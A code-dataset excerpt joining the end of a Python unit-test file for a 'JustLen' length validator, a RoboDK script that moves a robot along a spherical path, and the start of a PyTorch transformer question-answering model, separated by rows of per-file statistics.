self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_tuple_wrong_length(self):
log_msg = ['ERROR:root:Length of tuple test must be 7, not 3!']
err_msg = 'Length of tuple test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen((1, 2, 3), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_list(self):
out = JustLen([1, 2], length=2)
self.assertListEqual(out, [1, 2])
def test_error_on_length_of_list_not_in_lengths(self):
log_msg = ['ERROR:root:Length of list [1, 2, 3]'
' must be one of (4, 5), not 3!']
err_msg = 'Length of list [1, 2, 3] must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen([1, 2, 3], length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_list_wrong_length(self):
log_msg = ['ERROR:root:Length of list [1, 2, 3] must be 6, not 3!']
err_msg = 'Length of list [1, 2, 3] must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen([1, 2, 3], length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_list_wrong_length(self):
log_msg = ['ERROR:root:Length of list test must be 7, not 3!']
err_msg = 'Length of list test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen([1, 2, 3], 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_deque(self):
inp = deque([1, 2])
out = JustLen(inp, length=2)
self.assertIsInstance(out, type(inp))
self.assertEqual(inp, out)
def test_error_on_length_of_deque_not_in_lengths(self):
log_msg = ['ERROR:root:Length of deque([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of deque([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(deque([1, 2]), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_deque_wrong_length(self):
log_msg = ['ERROR:root:Length of deque([1, 2]) must be 6, not 2!']
err_msg = 'Length of deque([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(deque([1, 2]), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_deque_wrong_length(self):
log_msg = ['ERROR:root:Length of deque test must be 7, not 2!']
err_msg = 'Length of deque test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(deque([1, 2]), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_set(self):
out = JustLen({1, 2}, length=2)
self.assertSetEqual(out, {1, 2})
def test_error_on_length_of_set_not_in_lengths(self):
log_msg = ['ERROR:root:Length of set {1, 2, 3}'
' must be one of (4, 5), not 3!']
err_msg = 'Length of set {1, 2, 3} must be one of (4, 5), not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1, 2, 3}, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_set_wrong_length(self):
log_msg = ['ERROR:root:Length of set {1, 2, 3} must be 6, not 3!']
err_msg = 'Length of set {1, 2, 3} must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1, 2, 3}, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_set_wrong_length(self):
log_msg = ['ERROR:root:Length of set test must be 7, not 3!']
err_msg = 'Length of set test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1, 2, 3}, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_frozenset(self):
out = JustLen(frozenset((1, 2)), length=2)
self.assertIsInstance(out, frozenset)
self.assertSetEqual(out, frozenset((1, 2)))
def test_error_on_length_of_frozenset_not_in_lengths(self):
log_msg = ['ERROR:root:Length of frozenset({1, 2, 3})'
' must be one of (4, 5), not 3!']
err_msg = ('Length of frozenset({1, 2, 3}) '
'must be one of (4, 5), not 3!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(frozenset({1, 2, 3}), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_frozenset_wrong_length(self):
log_msg = ['ERROR:root:Length of frozenset({1, 2, 3})'
' must be 6, not 3!']
err_msg = 'Length of frozenset({1, 2, 3}) must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(frozenset({1, 2, 3}), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_frozenset_wrong_length(self):
log_msg = ['ERROR:root:Length of frozenset test must be 7, not 3!']
err_msg = 'Length of frozenset test must be 7, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(frozenset({1, 2, 3}), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict(self):
out = JustLen({1: 'one', 2: 'two'}, length=2)
self.assertDictEqual(out, {1: 'one', 2: 'two'})
def test_error_on_length_of_dict_not_in_lengths(self):
log_msg = ["ERROR:root:Length of dict {1: 'one', 2: 'two'}"
" must be one of (4, 5), not 2!"]
err_msg = ("Length of dict {1: 'one', 2: 'two'}"
" must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_wrong_length(self):
log_msg = ["ERROR:root:Length of dict {1: 'one', 2: 'two'}"
" must be 6, not 2!"]
err_msg = "Length of dict {1: 'one', 2: 'two'} must be 6, not 2!"
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_wrong_length(self):
log_msg = ['ERROR:root:Length of dict test must be 7, not 2!']
err_msg = 'Length of dict test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict_keys(self):
inp = {1: 'one', 2: 'two'}
out = JustLen(inp.keys(), length=2)
self.assertIsInstance(out, type(inp.keys()))
self.assertEqual(out, inp.keys())
def test_error_on_length_of_dict_keys_not_in_lengths(self):
log_msg = ['ERROR:root:Length of dict_keys([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of dict_keys([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.keys(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_keys_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_keys([1, 2]) must be 6, not 2!']
err_msg = 'Length of dict_keys([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.keys(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_keys_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_keys test must be 7, not 2!']
err_msg = 'Length of dict_keys test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.keys(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict_values(self):
inp = {1: 'one', 2: 'two'}
out = JustLen(inp.values(), length=2)
self.assertIsInstance(out, type(inp.values()))
def test_error_on_length_of_dict_values_not_in_lengths(self):
log_msg = ['ERROR:root:Length of dict_values([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of dict_values([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.values(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_values_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_values([1, 2])'
' must be 6, not 2!']
err_msg = 'Length of dict_values([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.values(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_values_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_values test must be 7, not 2!']
err_msg = 'Length of dict_values test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.values(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_dict_items(self):
inp = {1: 'one', 2: 'two'}
out = JustLen(inp.items(), length=2)
self.assertIsInstance(out, type(inp.items()))
def test_error_on_length_of_dict_items_not_in_lengths(self):
log_msg = ["ERROR:root:Length of dict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!"]
err_msg = ("Length of dict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.items(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_dict_items_wrong_length(self):
log_msg = ["ERROR:root:Length of dict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!"]
err_msg = ("Length of dict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({'one': 1, 'two': 2}.items(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_dict_items_wrong_length(self):
log_msg = ['ERROR:root:Length of dict_items test must be 7, not 2!']
err_msg = 'Length of dict_items test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen({1: 'one', 2: 'two'}.items(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_defaultdict(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
out = JustLen(inp, length=2)
self.assertDictEqual(out, inp)
def test_error_on_length_of_defaultdict_not_in_lengths(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of defaultdict(<class 'str'>, "
"{1: 'one', 2: 'two'}) must be one of (4, 5), not 2!"]
err_msg = ("Length of defaultdict(<class 'str'>, {1: 'one',"
" 2: 'two'}) must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_defaultdict_wrong_length(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of defaultdict(<class 'str'>, "
"{1: 'one', 2: 'two'}) must be 6, not 2!"]
err_msg = ("Length of defaultdict(<class 'str'>, "
"{1: 'one', 2: 'two'}) must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_defaultdict_wrong_length(self):
inp = defaultdict(str, {1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of defaultdict test must be 7, not 2!']
err_msg = 'Length of defaultdict test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordererddict(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp, length=2)
self.assertDictEqual(out, inp)
def test_error_on_length_of_ordererddict_not_in_lengths(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of OrderedDict([(1, 'one'),"
" (2, 'two')]) must be one of (4, 5), not 2!"]
err_msg = ("Length of OrderedDict([(1, 'one'), (2, "
"'two')]) must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordererddict_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ["ERROR:root:Length of OrderedDict([(1, "
"'one'), (2, 'two')]) must be 6, not 2!"]
err_msg = ("Length of OrderedDict([(1, 'one'),"
" (2, 'two')]) must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordererddict_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of OrderedDict test must be 7, not 2!']
err_msg = 'Length of OrderedDict test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp, 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordered_dict_keys(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp.keys(), length=2)
self.assertIsInstance(out, type(inp.keys()))
self.assertEqual(out, inp.keys())
def test_error_on_length_of_ordered_dict_keys_not_in_lengths(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of odict_keys([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = 'Length of odict_keys([1, 2]) must be one of (4, 5), not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.keys(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordered_dict_keys_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of odict_keys([1, 2]) must be 6, not 2!']
err_msg = 'Length of odict_keys([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.keys(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordered_dict_keys_wrong_length(self):
inp = OrderedDict({1: 'one', 2: 'two'})
log_msg = ['ERROR:root:Length of odict_keys test must be 7, not 2!']
err_msg = 'Length of odict_keys test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.keys(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordered_dict_values(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp.values(), length=2)
self.assertIsInstance(out, type(inp.values()))
def test_error_on_length_of_ordered_dict_values_not_in_lengths(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_values([1, 2])'
' must be one of (4, 5), not 2!']
err_msg = ('Length of odict_values([1, 2])'
' must be one of (4, 5), not 2!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.values(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordered_dict_values_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_values([1, 2])'
' must be 6, not 2!']
err_msg = 'Length of odict_values([1, 2]) must be 6, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.values(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordered_dict_values_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_values test must be 7, not 2!']
err_msg = 'Length of odict_values test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.values(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_works_with_sane_ordered_dict_items(self):
inp = OrderedDict({1: 'one', 2: 'two'})
out = JustLen(inp.items(), length=2)
self.assertIsInstance(out, type(inp.items()))
def test_error_on_length_of_ordered_dict_items_not_in_lengths(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ["ERROR:root:Length of odict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!"]
err_msg = ("Length of odict_items([('one', 1), ('two', 2)])"
" must be one of (4, 5), not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.items(), length=(4, 5))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_unnamed_ordered_dict_items_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ["ERROR:root:Length of odict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!"]
err_msg = ("Length of odict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.items(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordered_dict_items_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_items test must be 7, not 2!']
err_msg = 'Length of odict_items test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.items(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
class TestJustLenMethods(ut.TestCase):
def test_has_iterable_type_checker_attributes(self):
for iterable in _ITERABLES:
self.assertTrue(hasattr(JustLen, iterable.__name__))
for iterable in _LIKE_ITERABLES:
self.assertTrue(hasattr(JustLen, iterable.__name__))
self.assertTrue(hasattr(JustLen, 'LikeSized'))
def test_iterable_type_checkers_are_type_CompositionOf(self):
for iterable in _ITERABLES:
type_checker = getattr(JustLen, iterable.__name__)
self.assertIsInstance(type_checker, CompositionOf)
for iterable in _LIKE_ITERABLES:
type_checker = getattr(JustLen, iterable.__name__)
self.assertIsInstance(type_checker, CompositionOf)
sized_checker = getattr(JustLen, 'LikeSized')
self.assertIsInstance(sized_checker, CompositionOf)
def test_length_is_passed_through_type_checker(self):
log_msg = ['ERROR:root:Length of str bar must be 6, not 3!']
err_msg = 'Length of str bar must be 6, not 3!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen.JustStr('bar', length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_has_attribute_o(self):
self.assertTrue(hasattr(JustLen, 'o'))
def test_attribute_o_is_callable(self):
self.assertTrue(callable(JustLen.o))
def test_o_returns_composition(self):
def f(x):
return x
composition = JustLen.o(f)
self.assertIsInstance(composition, CompositionOf)
def test_o_raises_error_on_argument_not_callable(self):
err_msg = ('foo must be a callable that accepts (i) a value,'
' (ii) an optional name for that value, and (iii)'
' any number of keyword arguments!')
with self.assertRaises(CallableError) as err:
_ = JustLen.o('foo')
self.assertEqual(str(err.exception), err_msg)
if __name__ == '__main__':
ut.main()
| 47.994334
| 79
| 0.612501
| 4,727
| 33,884
| 4.20055
| 0.029617
| 0.036865
| 0.061442
| 0.064515
| 0.924053
| 0.916247
| 0.90693
| 0.897714
| 0.882554
| 0.869309
| 0
| 0.024499
| 0.259149
| 33,884
| 705
| 80
| 48.062411
| 0.766482
| 0
| 0
| 0.561688
| 0
| 0.012987
| 0.197586
| 0
| 0
| 0
| 0
| 0
| 0.400974
| 1
| 0.133117
| false
| 0.001623
| 0.012987
| 0.001623
| 0.152597
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0417459d1ee31c320551abac1621c3020ff7c9a7
| 4,464
|
py
|
Python
|
SpherePath.py
|
YoushaaMurhij/KR3_R540_AR_VR_Control
|
cb41a60935d7ae3b459d479f7b0ada0f364bbc33
|
[
"Apache-2.0"
] | 3
|
2020-07-08T09:56:34.000Z
|
2021-05-12T07:35:46.000Z
|
SpherePath.py
|
YoushaaMurhij/KR3_R540_AR_VR_Control
|
cb41a60935d7ae3b459d479f7b0ada0f364bbc33
|
[
"Apache-2.0"
] | null | null | null |
SpherePath.py
|
YoushaaMurhij/KR3_R540_AR_VR_Control
|
cb41a60935d7ae3b459d479f7b0ada0f364bbc33
|
[
"Apache-2.0"
] | 1
|
2021-07-23T08:04:24.000Z
|
2021-07-23T08:04:24.000Z
|
# Draw a hexagon around the Target 1
from robolink import * # RoboDK's API
from robodk import * # Math toolbox for robots
# Start the RoboDK API:
RDK = Robolink()
# Get the robot (first robot found):
robot = RDK.Item('', ITEM_TYPE_ROBOT)
# Get the reference target by name:
target = RDK.Item('Target 1')
target_pose = target.Pose()
xyz_ref = target_pose.Pos()
# Move the robot to the reference point:
robot.MoveJ(target)
# Draw a hexagon around the reference target:
##for i in range(7):
## ang = i*2*pi/6 # Angle = 0,60,120,...,360
## R = 50 # Polygon radius
## # Calculate the new position around the reference:
## x = xyz_ref[0] + R*cos(ang) # new X coordinate
## y = xyz_ref[1] + R*sin(ang) # new Y coordinate
## z = xyz_ref[2] # new Z coordinate
## target_pose.setPos([x,y,z])
## # Move to the new target:
## robot.MoveL(target_pose)
### Trigger a program call at the end of the movement
##robot.RunInstruction('Program_Done')
### Move back to the reference target:
##robot.MoveL(target)
##
##
### Move back to the reference target:
##robot.MoveL(target)
##target = RDK.Item('Target 2')
##target_pose = target.Pose()
##xyz_ref = target_pose.Pos()
##
##robot.MoveJ(target)
##num_steps=25
##R=100
##step=R/num_steps;
### Draw a circle around the reference target:
##for i in range(0, num_steps+1):
## x=xyz_ref[0]+R-i*step;
## y=(R**2-(x-xyz_ref[0])**2)**(0.5) + xyz_ref[1]
## z=xyz_ref[2]
## target_pose.setPos([x,y,z])
## robot.MoveL(target_pose)
##for i in range(0, num_steps+1):
## x=xyz_ref[0]-i*step;
## y=(R**2-(x-xyz_ref[0])**2)**(0.5) + xyz_ref[1]
## z=xyz_ref[2]
## target_pose.setPos([x,y,z])
## robot.MoveL(target_pose)
##for i in range(0, num_steps+1):
## x=xyz_ref[0]-R+i*step;
## y=-1*((R**2-(x-xyz_ref[0])**2)**(0.5)) + xyz_ref[1]
## z=xyz_ref[2]
## target_pose.setPos([x,y,z])
## robot.MoveL(target_pose)
##for i in range(0, num_steps+1):
## x=xyz_ref[0]+i*step;
## y=-1*(R**2-(x-xyz_ref[0])**2)**(0.5) + xyz_ref[1]
## z=xyz_ref[2]
## target_pose.setPos([x,y,z])
## robot.MoveL(target_pose)
### Trigger a program call at the end of the movement
##robot.RunInstruction('Program_Done')
### Move back to the reference target:
##robot.MoveL(target)
# Move back to the reference target:
robot.MoveL(target)
target = RDK.Item('Target 2')
target_pose = target.Pose()
xyz_ref = target_pose.Pos()
robot.MoveJ(target)
num_steps=15
num_steps_z=10
r=100
step_z=r/num_steps_z
# Draw a sphere around the reference target:
for j in range(num_steps_z,0,-1):
z=xyz_ref[2]-j*step_z
R=(r**2-(z-xyz_ref[2])**2)**0.5
step=R/num_steps
for i in range(0, num_steps+1):
x=xyz_ref[0]+R-i*step;
y=(R**2-(R-i*step)**2)**(0.5) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
for i in range(0, num_steps+1):
x=xyz_ref[0]-i*step;
y=(R**2-(i*step)**2)**(0.5) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
for i in range(0, num_steps+1):
x=xyz_ref[0]-R+i*step;
y=-1*((R**2-(-R+i*step)**2)**(0.5)) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
for i in range(0, num_steps+1):
x=xyz_ref[0]+i*step;
y=-1*(R**2-(i*step)**2)**(0.5) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
for j in range(0,num_steps_z+1):
z=xyz_ref[2]+j*step_z
R=(r**2-(z-xyz_ref[2])**2)**0.5
step=R/num_steps
for i in range(0, num_steps+1):
x=xyz_ref[0]+R-i*step;
y=(R**2-(R-i*step)**2)**(0.5) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
for i in range(0, num_steps+1):
x=xyz_ref[0]-i*step;
y=(R**2-(i*step)**2)**(0.5) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
for i in range(0, num_steps+1):
x=xyz_ref[0]-R+i*step;
y=-1*((R**2-(-R+i*step)**2)**(0.5)) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
for i in range(0, num_steps+1):
x=xyz_ref[0]+i*step;
y=-1*(R**2-(i*step)**2)**(0.5) + xyz_ref[1]
target_pose.setPos([x,y,z])
robot.MoveL(target_pose)
# Trigger a program call at the end of the movement
robot.RunInstruction('Program_Done')
# Move back to the reference target:
robot.MoveL(target)
| 31
| 57
| 0.598118
| 822
| 4,464
| 3.118005
| 0.103406
| 0.098322
| 0.112368
| 0.053063
| 0.802575
| 0.769411
| 0.761998
| 0.761998
| 0.738978
| 0.723761
| 0
| 0.044726
| 0.203629
| 4,464
| 143
| 58
| 31.216783
| 0.676231
| 0.458557
| 0
| 0.776119
| 0
| 0
| 0.012281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029851
| 0
| 0.029851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f098dc58ae44414f096a968db4ccb2bc034f78d9
| 4,104
|
py
|
Python
|
models/transformer_qa.py
|
jeffdshen/squad
|
61ed2120fc06f5e33204200ac0f8d86d1da6f361
|
[
"MIT"
] | null | null | null |
models/transformer_qa.py
|
jeffdshen/squad
|
61ed2120fc06f5e33204200ac0f8d86d1da6f361
|
[
"MIT"
] | null | null | null |
models/transformer_qa.py
|
jeffdshen/squad
|
61ed2120fc06f5e33204200ac0f8d86d1da6f361
|
[
"MIT"
] | null | null | null |
"""Various full transformer models for QA.
Author:
Jeffrey Shen
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.cuda.amp as amp
import models.transformer as T
class GloveTransformerQA(nn.Module):
def __init__(
self,
dim,
n_heads,
ff_dim,
activation,
dropout,
attn_dropout,
act_dropout,
n_layers,
max_positions,
word_vectors,
):
super().__init__()
self.embed = T.TransformerEncoderEmbedding(
T.PretrainedTokenEmbedding(word_vectors, dim),
T.LearnedPositionalEmbedding(max_positions, dim),
dim=dim,
dropout=dropout,
)
self.encoder = T.TransformerEncoder(
T.TransformerEncoderLayer(
dim=dim,
n_heads=n_heads,
ff_dim=ff_dim,
activation=activation,
dropout=dropout,
attn_dropout=attn_dropout,
act_dropout=act_dropout,
),
n_layers=n_layers,
)
self.head = T.LinearQAHead(dim=dim, output_logits=2)
self.apply(lambda mod: T.init_params_bert(mod, 0.02))
# (S, N), (S, N), (N, S) -> (S, N, 2)
@amp.autocast()
def forward(self, x, positions=None, padding_mask=None):
x = x.transpose(0, 1)
if positions is None:
positions = T.get_positions(x)
else:
positions = positions.transpose(0, 1)
x = self.embed(x, positions)
x = self.encoder.forward(x, key_padding_mask=padding_mask)
x = self.head(x)
x = x.transpose(0, 1)
return x
# (N, S, 2), (N, S) -> (N, S, 2)
def mask_scores(self, x, padding_mask):
return self.head.mask_scores(x, padding_mask)
# (N, S, 2) -> (N, S, 2)
